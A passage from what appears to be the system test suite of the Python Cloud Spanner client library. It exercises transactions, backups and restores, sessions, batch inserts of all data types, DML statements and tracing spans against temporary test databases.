with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
rows = list(transaction.read(test.TABLE, test.COLUMNS, self.ALL))
test.assertEqual(rows, [])
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice_4181(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
def _unit_of_work(transaction, name):
transaction.insert(COUNTERS_TABLE, COUNTERS_COLUMNS, [[name, 0]])
self._db.run_in_transaction(_unit_of_work, name="id_1")
with self.assertRaises(exceptions.AlreadyExists):
self._db.run_in_transaction(_unit_of_work, name="id_1")
self._db.run_in_transaction(_unit_of_work, name="id_2")
with self._db.snapshot() as after:
rows = list(after.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self.assertEqual(len(rows), 2)
@unittest.skipIf(USE_EMULATOR, "Skipping backup tests")
@unittest.skipIf(SKIP_BACKUP_TESTS, "Skipping backup tests")
class TestBackupAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
DATABASE_NAME_2 = "test_database2" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
db1 = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
db2 = Config.INSTANCE.database(cls.DATABASE_NAME_2, pool=pool)
cls._db = db1
cls._dbs = [db1, db2]
op1 = db1.create()
op2 = db2.create()
op1.result(30) # raises on failure / timeout.
op2.result(30) # raises on failure / timeout.
current_config = Config.INSTANCE.configuration_name
same_config_instance_id = "same-config" + unique_resource_id("-")
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
cls._same_config_instance = Config.CLIENT.instance(
same_config_instance_id, current_config, labels=labels
)
op = cls._same_config_instance.create()
op.result(30)
cls._instances = [cls._same_config_instance]
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
diff_configs = [
config.name
for config in configs
if "-us-" in config.name and config.name is not current_config
]
cls._diff_config_instance = None
if len(diff_configs) > 0:
diff_config_instance_id = "diff-config" + unique_resource_id("-")
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
cls._diff_config_instance = Config.CLIENT.instance(
diff_config_instance_id, diff_configs[0], labels=labels
)
op = cls._diff_config_instance.create()
op.result(30)
cls._instances.append(cls._diff_config_instance)
@classmethod
def tearDownClass(cls):
for db in cls._dbs:
db.drop()
for instance in cls._instances:
instance.delete()
def setUp(self):
self.to_delete = []
self.to_drop = []
def tearDown(self):
for doomed in self.to_delete:
doomed.delete()
for doomed in self.to_drop:
doomed.drop()
def test_create_invalid(self):
from datetime import datetime
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow()
expire_time = expire_time.replace(tzinfo=UTC)
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
with self.assertRaises(exceptions.InvalidArgument):
op = backup.create()
op.result()
def test_backup_workflow(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
instance = Config.INSTANCE
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = instance.backup(backup_id, database=self._db, expire_time=expire_time)
operation = backup.create()
self.to_delete.append(backup)
# Check metadata.
metadata = operation.metadata
self.assertEqual(backup.name, metadata.name)
self.assertEqual(self._db.name, metadata.database)
operation.result()
# Check backup object.
backup.reload()
self.assertEqual(self._db.name, backup._database)
self.assertEqual(expire_time, backup.expire_time)
self.assertIsNotNone(backup.create_time)
self.assertIsNotNone(backup.size_bytes)
self.assertIsNotNone(backup.state)
# Update with valid argument.
valid_expire_time = datetime.utcnow() + timedelta(days=7)
valid_expire_time = valid_expire_time.replace(tzinfo=UTC)
backup.update_expire_time(valid_expire_time)
self.assertEqual(valid_expire_time, backup.expire_time)
# Restore database to same instance.
restored_id = "restored_db" + unique_resource_id("_")
database = instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
operation.result()
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_restore_to_diff_instance(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
op = backup.create()
self.to_delete.append(backup)
op.result()
# Restore database to different instance with same config.
restored_id = "restored_db" + unique_resource_id("_")
database = self._same_config_instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
operation.result()
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_multi_create_cancel_update_error_restore_errors(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
backup1 = instance.backup(
backup_id_1, database=self._dbs[0], expire_time=expire_time
)
backup2 = instance.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time
)
# Create two backups.
op1 = backup1.create()
op2 = backup2.create()
self.to_delete.extend([backup1, backup2])
backup1.reload()
self.assertFalse(backup1.is_ready())
backup2.reload()
self.assertFalse(backup2.is_ready())
# Cancel a create operation.
op2.cancel()
self.assertTrue(op2.cancelled())
op1.result()
backup1.reload()
self.assertTrue(backup1.is_ready())
# Update expire time to invalid value.
invalid_expire_time = datetime.now() + timedelta(days=366)
invalid_expire_time = invalid_expire_time.replace(tzinfo=UTC)
with self.assertRaises(exceptions.InvalidArgument):
backup1.update_expire_time(invalid_expire_time)
# Restore to existing database.
with self.assertRaises(exceptions.AlreadyExists):
self._db.restore(source=backup1)
# Restore to instance with different config.
if self._diff_config_instance is not None:
return
new_db = self._diff_config_instance.database("diff_config")
op = new_db.create()
op.result(30)
self.to_drop.append(new_db)
with self.assertRaises(exceptions.InvalidArgument):
new_db.restore(source=backup1)
def test_list_backups(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time_1 = datetime.utcnow() + timedelta(days=21)
expire_time_1 = expire_time_1.replace(tzinfo=UTC)
backup1 = Config.INSTANCE.backup(
backup_id_1, database=self._dbs[0], expire_time=expire_time_1
)
expire_time_2 = datetime.utcnow() + timedelta(days=1)
expire_time_2 = expire_time_2.replace(tzinfo=UTC)
backup2 = Config.INSTANCE.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time_2
)
# Create two backups.
op1 = backup1.create()
op1.result()
backup1.reload()
create_time_compare = datetime.utcnow().replace(tzinfo=UTC)
backup2.create()
self.to_delete.extend([backup1, backup2])
# List backups filtered by state.
filter_ = "state:CREATING"
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by backup name.
filter_ = "name:{0}".format(backup_id_1)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by database name.
filter_ = "database:{0}".format(self._dbs[0].name)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by create time.
filter_ = 'create_time > "{0}"'.format(
create_time_compare.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by expire time.
filter_ = 'expire_time > "{0}"'.format(
expire_time_1.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by size bytes.
filter_ = "size_bytes < {0}".format(backup1.size_bytes)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups using pagination.
count = 0
for page in instance.list_backups(page_size=1):
count += 1
self.assertEqual(count, 2)
SOME_DATE = datetime.date(2011, 1, 17)
SOME_TIME = datetime.datetime(1989, 1, 17, 17, 59, 12, 345612)
NANO_TIME = DatetimeWithNanoseconds(1995, 8, 31, nanosecond=987654321)
POS_INF = float("+inf")
NEG_INF = float("-inf")
(OTHER_NAN,) = struct.unpack("<d", b"\x01\x00\x01\x00\x00\x00\xf8\xff")
BYTES_1 = b"Ymlu"
BYTES_2 = b"Ym9vdHM="
NUMERIC_1 = decimal.Decimal("0.123456789")
NUMERIC_2 = decimal.Decimal("1234567890")
ALL_TYPES_TABLE = "all_types"
ALL_TYPES_COLUMNS = (
"pkey",
"int_value",
"int_array",
"bool_value",
"bool_array",
"bytes_value",
"bytes_array",
"date_value",
"date_array",
"float_value",
"float_array",
"string_value",
"string_array",
"timestamp_value",
"timestamp_array",
"numeric_value",
"numeric_array",
)
EMULATOR_ALL_TYPES_COLUMNS = ALL_TYPES_COLUMNS[:-2]
AllTypesRowData = collections.namedtuple("AllTypesRowData", ALL_TYPES_COLUMNS)
AllTypesRowData.__new__.__defaults__ = tuple([None for colum in ALL_TYPES_COLUMNS])
EmulatorAllTypesRowData = collections.namedtuple(
"EmulatorAllTypesRowData", EMULATOR_ALL_TYPES_COLUMNS
)
EmulatorAllTypesRowData.__new__.__defaults__ = tuple(
[None for colum in EMULATOR_ALL_TYPES_COLUMNS]
)
ALL_TYPES_ROWDATA = (
# all nulls
AllTypesRowData(pkey=0),
# Non-null values
AllTypesRowData(pkey=101, int_value=123),
AllTypesRowData(pkey=102, bool_value=False),
AllTypesRowData(pkey=103, bytes_value=BYTES_1),
AllTypesRowData(pkey=104, date_value=SOME_DATE),
AllTypesRowData(pkey=105, float_value=1.4142136),
AllTypesRowData(pkey=106, string_value=u"VALUE"),
AllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
AllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
AllTypesRowData(pkey=109, numeric_value=NUMERIC_1),
# empty array values
AllTypesRowData(pkey=201, int_array=[]),
AllTypesRowData(pkey=202, bool_array=[]),
AllTypesRowData(pkey=203, bytes_array=[]),
AllTypesRowData(pkey=204, date_array=[]),
AllTypesRowData(pkey=205, float_array=[]),
AllTypesRowData(pkey=206, string_array=[]),
AllTypesRowData(pkey=207, timestamp_array=[]),
AllTypesRowData(pkey=208, numeric_array=[]),
# non-empty array values, including nulls
AllTypesRowData(pkey=301, int_array=[123, 456, None]),
AllTypesRowData(pkey=302, bool_array=[True, False, None]),
AllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
AllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
AllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
AllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
AllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
AllTypesRowData(pkey=308, numeric_array=[NUMERIC_1, NUMERIC_2, None]),
)
EMULATOR_ALL_TYPES_ROWDATA = (
# all nulls
EmulatorAllTypesRowData(pkey=0),
# Non-null values
EmulatorAllTypesRowData(pkey=101, int_value=123),
EmulatorAllTypesRowData(pkey=102, bool_value=False),
EmulatorAllTypesRowData(pkey=103, bytes_value=BYTES_1),
EmulatorAllTypesRowData(pkey=104, date_value=SOME_DATE),
EmulatorAllTypesRowData(pkey=105, float_value=1.4142136),
EmulatorAllTypesRowData(pkey=106, string_value=u"VALUE"),
EmulatorAllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
EmulatorAllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
# empty array values
EmulatorAllTypesRowData(pkey=201, int_array=[]),
EmulatorAllTypesRowData(pkey=202, bool_array=[]),
EmulatorAllTypesRowData(pkey=203, bytes_array=[]),
EmulatorAllTypesRowData(pkey=204, date_array=[]),
EmulatorAllTypesRowData(pkey=205, float_array=[]),
EmulatorAllTypesRowData(pkey=206, string_array=[]),
EmulatorAllTypesRowData(pkey=207, timestamp_array=[]),
# non-empty array values, including nulls
EmulatorAllTypesRowData(pkey=301, int_array=[123, 456, None]),
EmulatorAllTypesRowData(pkey=302, bool_array=[True, False, None]),
EmulatorAllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
EmulatorAllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
EmulatorAllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
EmulatorAllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
EmulatorAllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
)
class TestSessionAPI(OpenTelemetryBase, _TestData):
DATABASE_NAME = "test_sessions" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "session_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
operation = cls._db.create()
operation.result(30) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
super(TestSessionAPI, self).setUp()
self.to_delete = []
def tearDown(self):
super(TestSessionAPI, self).tearDown()
for doomed in self.to_delete:
doomed.delete()
def test_session_crud(self):
retry_true = RetryResult(operator.truth)
retry_false = RetryResult(operator.not_)
session = self._db.session()
self.assertFalse(session.exists())
session.create()
retry_true(session.exists)()
session.delete()
retry_false(session.exists)()
def test_batch_insert_then_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
if HAS_OPENTELEMETRY_INSTALLED:
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 4)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[0],
)
self.assertSpanAttributes(
"CloudSpanner.Commit",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "num_mutations": 2}
),
span=span_list[1],
)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[2],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"columns": self.COLUMNS,
"table_id": self.TABLE,
}
),
span=span_list[3],
)
def test_batch_insert_then_read_string_array_of_string(self):
table = "string_plus_array_of_string"
columns = ["id", "name", "tags"]
rowdata = [
(0, None, None),
(1, "phred", ["yabba", "dabba", "do"]),
(2, "bharney", []),
(3, "wylma", ["oh", None, "phred"]),
]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, rowdata)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self._check_rows_data(rows, expected=rowdata)
def test_batch_insert_then_read_all_datatypes(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
if USE_EMULATOR:
all_types_columns = EMULATOR_ALL_TYPES_COLUMNS
all_types_rowdata = EMULATOR_ALL_TYPES_ROWDATA
else:
all_types_columns = ALL_TYPES_COLUMNS
all_types_rowdata = ALL_TYPES_ROWDATA
with self._db.batch() as batch:
batch.delete(ALL_TYPES_TABLE, self.ALL)
batch.insert(ALL_TYPES_TABLE, all_types_columns, all_types_rowdata)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(ALL_TYPES_TABLE, all_types_columns, self.ALL))
self._check_rows_data(rows, expected=all_types_rowdata)
def test_batch_insert_or_update_then_query(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_batch_insert_w_commit_timestamp(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
table = "users_history"
columns = ["id", "commit_ts", "name", "email", "deleted"]
user_id = 1234
name = "phred"
email = "phred@example.com"
row_data = [[user_id, COMMIT_TIMESTAMP, name, email, False]]
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, row_data)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self.assertEqual(len(rows), 1)
r_id, commit_ts, r_name, r_email, deleted = rows[0]
self.assertEqual(r_id, user_id)
self.assertEqual(commit_ts, batch.committed)
self.assertEqual(r_name, name)
self.assertEqual(r_email, email)
self.assertFalse(deleted)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Aborted)
def test_transaction_read_and_insert_then_rollback(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
if HAS_OPENTELEMETRY_INSTALLED:
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 8)
self.assertSpanAttributes(
"CloudSpanner.CreateSession",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[0],
)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[1],
)
self.assertSpanAttributes(
"CloudSpanner.Commit",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "num_mutations": 1}
),
span=span_list[2],
)
self.assertSpanAttributes(
"CloudSpanner.BeginTransaction",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[3],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[4],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[5],
)
self.assertSpanAttributes(
"CloudSpanner.Rollback",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[6],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[7],
)
def _transaction_read_then_raise(self, transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(len(rows), 0)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
raise CustomException()
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_then_exception(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with self.assertRaises(CustomException):
self._db.run_in_transaction(self._transaction_read_then_raise)
# Transaction was rolled back.
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_or_update_then_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
def _generate_insert_statements(self):
insert_template = "INSERT INTO {table} ({column_list}) " "VALUES ({row_data})"
for row in self.ROW_DATA:
yield insert_template.format(
table=self.TABLE,
column_list=", ".join(self.COLUMNS),
row_data='{}, "{}", "{}", "{}"'.format(*row),
)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_sql_w_dml_read_rollback(self):
# [START spanner_test_dml_rollback_txn_not_committed]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
result = transaction.execute_sql(insert_statement)
list(result) # iterate to get stats
self.assertEqual(result.stats.row_count_exact, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_rollback_txn_not_committed]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_read_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_then_insert_commit(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA[1:])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_update]
# [END spanner_test_dml_with_mutation]
@staticmethod
def _check_batch_status(status_code, expected=code_pb2.OK):
if status_code != expected:
grpc_status_code = _STATUS_CODE_TO_GRPC_STATUS_CODE[status_code]
call = FauxCall(status_code)
raise exceptions.from_grpc_status(
grpc_status_code, "batch_update failed", errors=[call]
)
def test_transaction_batch_update_success(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_with_mutation]
# [END spanner_test_dml_update]
def test_transaction_batch_update_and_execute_dml(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statements = list(self._generate_insert_statements())
update_statements = [
(
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
]
delete_statement = "DELETE contacts WHERE TRUE;"
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
insert_statements + update_statements
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), len(insert_statements) + 1)
for row_count in row_counts:
self.assertEqual(row_count, 1)
row_count = transaction.execute_update(delete_statement)
self.assertEqual(row_count, len(insert_statements))
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
def test_transaction_batch_update_w_syntax_error(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDTAE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code, code_pb2.INVALID_ARGUMENT)
self.assertEqual(len(row_counts), 1)
self.assertEqual(row_counts[0], 1)
session.run_in_transaction(unit_of_work)
def test_transaction_batch_update_wo_statements(self):
from google.api_core.exceptions import InvalidArgument
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.transaction() as transaction:
with self.assertRaises(InvalidArgument):
transaction.batch_update([])
def test_transaction_batch_update_w_parent_span(self):
try:
from opentelemetry import trace
except ImportError:
return
tracer = trace.get_tracer(__name__)
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction, self):
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
with tracer.start_as_current_span("Test Span"):
session.run_in_transaction(unit_of_work, self)
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 6)
self.assertEqual(
list(map(lambda span: span.name, span_list)),
[
"CloudSpanner.CreateSession",
"CloudSpanner.Commit",
"CloudSpanner.BeginTransaction",
